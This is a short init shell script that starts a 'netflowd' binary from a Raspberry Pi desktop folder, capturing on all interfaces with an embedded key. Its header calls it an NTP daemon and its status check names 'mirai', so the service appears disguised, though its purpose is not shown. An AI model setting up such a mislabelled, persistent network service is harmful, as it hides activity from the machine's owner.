#!/bin/sh

### BEGIN INIT INFO
# Provides:        netflowd
# Required-Start:  $network $remote_fs $syslog
# Required-Stop:   $network $remote_fs $syslog
# Default-Start:   2 3 4 5
# Default-Stop: 
# Short-Description: Start NTP daemon
### END INIT INFO

start() {
	exec /home/pi/Desktop/armv7l/netflowd -i any -w pi04d61eeb6b61281c4b5ba0f512a190b3eb9 -l /var/log/netflowd.log -S 50000 -P 600
        echo
}

stop() {
        killproc netflowd
}

case "$1" in
  start)
        start
        ;;
  stop)
        stop
        ;;
  status)
        status mirai
        ;;
  restart|reload|condrestart)
        stop
        start
        ;;
  *)
        echo $"Usage: $0 {start|stop|restart|reload|status}"
        exit 1
esac

exit 0

